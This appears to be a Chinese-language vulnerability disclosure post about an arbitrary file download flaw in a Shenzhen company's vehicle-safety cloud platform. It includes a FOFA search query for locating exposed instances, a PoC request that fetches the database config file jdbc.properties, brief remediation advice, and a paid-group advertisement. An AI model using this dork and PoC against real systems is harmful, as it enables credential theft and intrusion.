深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞

   深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞，攻击者可通过此漏洞下载敏感文件信息，从而为下一步攻击做准备。

1、fofa

body="./open/webApi.html"

2、部分界面如下

3、POC验证

/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

1、对下载路径进行过滤，如下载前对传入的参数进行过滤，并且对下载文件类型进行检查，是否是允许下载的类型，另外禁止使用回溯符../！

    因为很多未公开或者小范围公开的漏洞不能直接发公众号，所以后面部分漏洞会直接整理发表在知识大陆，持续更新，目前进入需要19.9元。（收费主要是想参与freebuf知识大陆活动），持续更新中，链接如下：

https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2

    加入帮会后扫描二维码加入群聊，（超200人需要一个一个拉比较麻烦，索性直接建立个2群，已加入的就不要重复加了，感谢）。